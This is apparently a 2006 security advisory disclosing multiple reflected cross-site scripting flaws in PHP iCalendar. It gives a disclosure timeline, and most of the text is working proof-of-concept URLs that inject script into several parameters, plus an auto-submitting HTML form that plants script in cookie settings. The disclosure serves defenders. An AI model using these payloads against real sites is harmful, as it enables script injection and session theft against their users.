PHP icalendar multiple variable cross site scripting

Wednesday, December 27, 2006
#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
OSVDB ID:32493,32494,32495,32496,32497,32498,32499,32500
Securitytracker:1017449
Secunia:SA23499
BID:21792
#####################################################


PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.

######################
versions
######################

all of this versions have been tested
Posible other versions are prone vulnerables.

PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1

######################
Solution:
######################

No solution was available at this time!!

##################
Time Line
##################

Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006

###################
EXAMPLES & PoC
###################

http://localhost/phpicalendar/day.php?cal=
all_calendars_combined971&getdate=
20061225"><script>alert()</script>

http://localhost/phpicalendar/month.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/year.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/week.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/day.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/month.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain
)%3C/script%3E&getdate=20061225&cal%5B%5D
=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/year.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/week.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


----


http://localhost/phpicalendar/search.php?cpath=
&cal=Home%2CUS%2BHolidays%2CWork&getdate=
19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15


http://localhost/phpicalendar/search.php?cpath=
"><script>alert()</script>&
cal=Home%2CUS%2BHolidays2CWork&getdate=
19700102&query=ss&submit.x=11&submit.y=12



http://localhost/phpicalendar/search.php?cpath=&
cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102
"><script>alert()</script>&
query=ss&submit.x=11&submit.y=12

----

http://localhost/phpicalendar/rss/index.php?cal=Home
,US+Holidays,Work&getdate=20061225"><
script>alert()</script>

http://localhost/phpicalendar/print.php?cal=Home,
US+Holidays,Work&getdate=20061225%22%3E%3Cscr
ipt%3Ealert()%3C/script%3E&printview=day

################################
Proof of concept for preferences
################################

Multiple param XSS in preferences.php

Use the proof and modify some params
create a evil cookie before submit :)

http://localhost/phpicalendar/preferences.php?cal=
Home,US+Holidays,Work&getdate=20061227%22%3E%3
Cscript%3Ealert()%3C/script%3E


<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='cpath' style='width: 80%' /><br>

cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
&lt;script&gt;
document.forms[0].submit()
&lt;/script&gt;
</textarea>
</body>
</html>
 

######################## €nd #####################

Thnx to Estrella to be my ligth.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...